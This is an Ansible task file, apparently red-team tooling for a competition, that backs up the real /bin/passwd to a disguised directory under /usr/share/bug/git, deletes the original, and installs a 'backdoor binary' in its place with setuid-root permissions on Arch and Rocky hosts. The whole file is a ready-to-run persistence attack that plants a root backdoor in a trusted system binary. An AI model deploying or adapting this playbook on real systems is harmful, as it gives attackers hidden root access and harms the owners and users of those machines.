---
- name: RETRIEVER | Make Dir | Create backup directory
  when: 
    - inventory_hostname in groups['orca']
    - inventory_hostname in groups['albatross']
  ansible.builtin.file:
    path: /usr/share/bug/git
    state: directory
    mode: 0755

- name: RETRIEVER | Copy File | Backup og binary
  when: 
    - inventory_hostname in groups ['orca']
    - inventory_hostname in groups['albatross']
  ansible.builtin.copy:
    src: /bin/passwd
    dest: /usr/share/bug/git/passwd.bak
    mode: 0755
    remote_src: yes

- name: RETRIEVER | Delete File | Remove og binary
  when: 
    - inventory_hostname in groups ['orca']
    - inventory_hostname in groups['albatross']
  ansible.builtin.file:
    path: /bin/passwd
    state: absent
    
- name: RETRIEVER | Copy File | Install backdoor binary (Arch/Albatross)
  when: inventory_hostname in groups['albatross']
  ansible.builtin.copy:
    src: files/passwd_arch
    dest: /bin/passwd
    mode: 04755

- name: RETRIEVER | Copy File | Install backdoor binary (Rocky/Orca)
  when: inventory_hostname in groups['orca']
  ansible.builtin.copy:
    src: files/passwd_rocky
    dest: /bin/passwd
    mode: 04755